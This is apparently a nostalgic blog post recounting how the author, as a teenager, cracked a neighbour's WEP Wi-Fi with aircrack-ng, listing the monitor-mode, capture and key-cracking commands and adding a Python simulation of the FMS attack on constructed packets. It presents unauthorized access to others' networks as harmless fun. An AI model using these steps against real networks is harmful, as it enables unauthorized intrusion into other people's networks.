Let me take you back to 2007-2008 in the warm tropical city of Caracas, Venezuela. As in many other cities around the globe, the emerging internet was spreading everywhere like an invisible tapestry. Businesses, residences, restaurants, and many other places started popping up in the 2.4 GHz spectrum. Of course, most of these networks were locked down, and the gatekeeper at the time was the WEP security protocol. WEP stands for "Wired Equivalent Privacy", and the whole point of the protocol was to prevent unauthorized access to wireless networks.
Back then I wasn't really into security. In fact, I was certain my destiny was to become a famous video game developer. I had started to mess around with game programming and had already realized how much work making games really was. At the same time, my dad had started to dabble with Linux, and it had started to pique my interest. I remember setting up Linux on my laptop, back in the day when you had to hack your way around installing graphics and wireless network drivers. It was a huge pain in the butt, but the sense of accomplishment and freedom when you finally got it to run was fantastic. Besides, it was baffling to me that machines could run operating systems that were neither macOS nor Windows!
My dad started collecting "Linux Magazines", and that is how one day I stumbled upon one that talked about this new tool called "aircrack-ng". I remember opening it up and reading the article in awe. It talked about a tool that could easily break WEP encryption and eventually retrieve the password for wireless networks using said protocol. There was a moment of true excitement as I realized what this meant: "Free. Internet. Everywhere!"
I immediately ran to my computer, booted up Ubuntu, and spent the next couple of hours setting everything up to download aircrack. I distinctly remember struggling to get the internal wireless card of my computer to work properly. Finally, I typed the first command into the console:
airmon-ng start wlan0
Boom! No errors! Yes! The wireless card switched into monitor mode. According to the magazine, this first step meant my wireless card was now able to read packets that weren't intended for it. At the time I didn't quite understand what that meant, but I was just going to go along with it. I quickly read the next step:
airodump-ng mon0
Suddenly a wall of text showed up in front of me. Holy crap! These were all the wireless networks nearby. I could see our wireless network there, but I already knew the password for that. No fun in hacking that. Besides, our internet wasn't as fast as I'd have liked at the time... but I had overheard the kids living on the floor below once brag about their 1MB internet access. Now THAT was an interesting challenge.
I quickly found their wireless network because it had the name of one of the kids (I forgot what he was called, so let's just call him Alberto). I quickly glanced over the magazine and found the next steps:
airodump-ng -c 11 --essid Alberto -w output --ivs mon0
Airodump started doing its thing, whatever its thing was. I glanced back at the magazine and read that airodump was now capturing all the packets from the wireless network. It said I needed a ton of IVs to break it. I skipped ahead a bit; it didn't quite explain what IVs were, but a quick Google search mentioned something about Initialization Vectors. That didn't help much, but I guess it wasn't super important for me to know at the time.
The next step was optional: it said that if I didn't see much traffic I could induce more by using aireplay. I looked up over the edge of the magazine and saw the numbers on my screen soaring. That network had plenty of traffic; the kid was probably torrenting or something.
I waited a bit more, staring at the numbers and re-reading the instructions, mentally checking I hadn't messed up any previous commands. You see, if this worked... my god, if this worked... I would have internet wherever I went. Places such as my grandmother's house, school, or the beach would all suddenly be connected to the internet. I know it may seem a bit ridiculous reading this. Most of us now have access to the Internet wherever we go, but you gotta understand that, at the time, I barely had access to any WiFi outside of my own home. Furthermore, my internet access was really slow. And lastly, this felt like a badass thing to do.
After waiting for what seemed like an eternity I ran the final command:
aircrack-ng -b 00:14:6C:7E:40:80 output*.ivs
The screen flashed with numbers and symbols. I had no idea what was happening behind the scenes, but I felt like a grade-A certified hacker. I crossed my fingers in anticipation. Then the screen stopped and a message popped up:
Not Enough IVs!
God, I knew it! I knew it was too good to be true! What happened? I looked at the error and then back at the magazine. I retraced all the steps. Do I have to redo this? I pondered for a second, looking at random steps. However, there was a final paragraph in the magazine that talked about using -K instead. What did that mean? I popped into the command line again:
aircrack-ng -h
A "helpful" list of parameters popped up on the screen. Scanning it, I found -K. Apparently this "invoked the FMS/KoreK method". Huh... weird, but whatever, let's try that out.
aircrack-ng -K -b 00:14:6C:7E:40:80 output*.ivs
This time the numbers flashed back on the screen and my anticipation grew. Part of me was still excited; another part was telling me I was going to get an error again. Suddenly the screen flashed again:
KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
YEEEESSSSS! THANK YOU GOD!
I was ecstatic, my hands flew over the keyboard as I looked up a hex-to-ASCII table. I quickly translated the password into readable human text. I don't remember the password now, but I remember it being silly.
I quickly restarted the machine and clicked on wireless settings, selected Alberto, and plugged in the password.
Connection Successful!
I quickly opened the browser and saw Google load.
Holy Sh--....
I stayed static for a second in disbelief. Did I just do that?
I did a speed test and almost shed a tear when I saw that 1MB speed these guys had. I ran out of the room yelling for my dad. I told him what I'd done and he was extremely curious. He ran up to my computer and saw the connection.
"Holy cow! How'd you do this?" We spent the next few hours playing with aircrack, breaking every single wireless network nearby.
The next year or so was glorious, I had Internet everywhere I went, and the excitement of breaking these networks had motivated me to understand cryptography and wireless security better. I started reading up on the RC4 cipher, IVs, and what exactly was happening behind the scenes with aircrack and WEP. I even wrote my IB thesis on "Breaking WEP".
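For anyone who, like me back then, wants to see what -K was actually doing: it selects the FMS/KoreK statistical attack, and the original Fluhrer-Mantin-Shamir part of it is small enough to simulate. WEP prepends the 24-bit IV (sent in the clear) to the secret key, so an attacker knows the first three bytes of every per-packet RC4 key; for "weak" IVs of the form (A+3, 255, X), the first keystream byte (recovered because every WEP data frame starts with the known LLC/SNAP byte 0xAA) leaks secret byte A with roughly 5% probability, which a majority vote over a few hundred such IVs turns into the key, one byte at a time. The Python below is an added example, not code from this post, the magazine, or the aircrack-ng project: it encrypts constructed frames under a constructed 40-bit key (the same hex as the key in the story), builds the attacker's side of the vote, keeps the top few candidates per byte in the spirit of aircrack's fudge factor, and confirms a full key by checking that a frame decrypts to the SNAP header AA AA 03. All function names are mine; the KoreK classes and the later PTW attack are not implemented.

```python
# Simulated Fluhrer-Mantin-Shamir attack on WEP's RC4 keying.
# Added example: not the post's, the magazine's or aircrack-ng's own code.
# DEMO_KEY, the weak IVs and the packet payload are constructed for the demo.

SNAP_HEADER = bytes([0xAA, 0xAA, 0x03])  # LLC/SNAP bytes that start every WEP data frame


def rc4_ksa(key: bytes) -> list:
    """RC4 key scheduling: returns the 256-entry permutation S."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(key: bytes, n: int) -> bytes:
    """RC4 PRGA: the first n keystream bytes for key."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_crypt(iv: bytes, secret: bytes, data: bytes) -> bytes:
    """WEP's per-packet RC4 key is IV || secret; XOR makes this both encrypt and decrypt."""
    return bytes(p ^ k for p, k in zip(data, rc4_keystream(iv + secret, len(data))))


def fms_vote(iv: bytes, first_ct_byte: int, known: bytes):
    """One FMS vote for secret byte index len(known).

    Replays the KSA for the key bytes the attacker knows (IV plus recovered
    bytes). If the IV leaves S in a 'resolved' state, the first keystream
    byte equals the S entry swapped into position A+3 by the next KSA step
    with probability about e**-3 (~5%), which pins down key byte A+3.
    Otherwise this IV says nothing and None is returned.
    """
    a = len(known)
    prefix = iv + known
    s = list(range(256))
    j = 0
    for i in range(a + 3):
        j = (j + s[i] + prefix[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
    if s[1] >= a + 3 or (s[1] + s[s[1]]) & 0xFF != a + 3:
        return None
    z = first_ct_byte ^ SNAP_HEADER[0]  # first keystream byte: the plaintext byte is known
    return (s.index(z) - j - s[a + 3]) & 0xFF


def fms_candidates(packets, known: bytes, top: int) -> list:
    """Tally votes from weak IVs (A+3, 255, X) and return the `top` most-voted byte values."""
    a = len(known)
    votes = [0] * 256
    for iv, ct in packets:
        if iv[0] == a + 3 and iv[1] == 0xFF:
            guess = fms_vote(iv, ct[0], known)
            if guess is not None:
                votes[guess] += 1
    return sorted(range(256), key=lambda b: -votes[b])[:top]


def fms_recover(packets, key_len: int, fudge: int = 3, known: bytes = b""):
    """Depth-first search over the top `fudge` candidates per byte (the idea behind
    aircrack-ng's fudge factor), confirming a full key by decrypting one packet and
    checking for the SNAP header. Returns the key or None."""
    if len(known) == key_len:
        iv, ct = packets[0]
        return known if wep_crypt(iv, known, ct)[:3] == SNAP_HEADER else None
    for b in fms_candidates(packets, known, fudge):
        key = fms_recover(packets, key_len, fudge, known + bytes([b]))
        if key is not None:
            return key
    return None


def capture_weak_ivs(secret: bytes) -> list:
    """Constructed 'airodump capture': one frame per weak IV (A+3, 255, X) per key byte."""
    payload = SNAP_HEADER + bytes([0, 0, 0, 0x08, 0x00]) + b"constructed IPv4 payload"
    packets = []
    for a in range(len(secret)):
        for x in range(256):
            iv = bytes([a + 3, 0xFF, x])
            packets.append((iv, wep_crypt(iv, secret, payload)))
    return packets


DEMO_KEY = bytes.fromhex("1234567890")  # constructed 40-bit key, like the one in the story

if __name__ == "__main__":
    found = fms_recover(capture_weak_ivs(DEMO_KEY), len(DEMO_KEY))
    print("KEY FOUND! [ %s ]" % found.hex(":") if found else "Not enough IVs!")
```

The "Not enough IVs" message from the story is the same situation this code hits when too few resolved weak IVs have been seen: the correct byte does not stand out from the noise votes, so no candidate survives the SNAP check. The simulated capture hands the attacker all 256 IVs of each weak class at once, which is why a 40-bit key falls immediately here; in the real attack airodump had to sit on the channel until a torrenting neighbour had produced that many.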
Not long after, routers started deprecating WEP and the more "un-hackable" WPA/WPA2 showed up. Although this meant I could no longer break into these networks, things balanced out because Internet access became a bit more affordable and a lot of places such as pizzerias and cafés started to provide free hotspots.
I'd argue this was probably one of the first events that tilted my path towards computer security. At the very least, it made me realize that computers, networks, and other devices we trusted so much were actually a lot more flawed than I imagined. And that if you were smart enough and knew where to look, you could do all sorts of mischievous things.... 😉
Remembering those days of discovery...